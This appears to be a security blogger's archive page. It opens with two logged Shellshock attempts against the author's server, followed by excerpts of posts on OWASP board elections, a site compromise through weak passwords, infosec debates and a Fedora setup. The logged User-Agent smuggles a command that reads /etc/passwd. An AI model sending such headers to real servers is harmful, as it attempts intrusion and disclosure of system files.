85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"
Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
Author: vanderaj
Standing for the OWASP Board
I have formally submitted my name to be in the Board Elections 2014. I am standing for: Reforming the Board. We need to improve the independence, ethics and dispute resolution processes. I will be a root and branch reformer to encourage the Board to make a couple of the positions available to truly independent directors….
So it’s finally happened
Passwords. Pah. After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords. Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational…
AppSec EU – DevGuide all day working party! Be a part of it!
Be a part of the upcoming AppSec EU in Cambridge! UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. Eoin Keary and I will be running an all day working party on the Developer Guide on June 24…
Stop. Just stop.
In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”…
So your Twitter has been hacked. Now what?
So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DMs are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST…
El Reg and the troubling case of climate denialism
This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate…
Infosec apostasy
I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security: those who aim via various usual suspects to protect things; and those who aim via various often…
Marketing – first against the wall when the revolution comes
A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call. *Click* As a consumer, you must hang up to avoid being scammed. End of story. No exceptions. Even if the business has a relationship…
Update on Fedora 18 on VMware Fusion 5.0.3
Everything now works. The quick version is: (1) create a new Fedora 18 VM; (2) do not use “Easy install”; (3) disable 3D acceleration in the VM settings (Command-E) prior to starting the install, otherwise you get a spinning idle cursor and no action upon first boot; (4) install as you see fit. I use a 64 bit…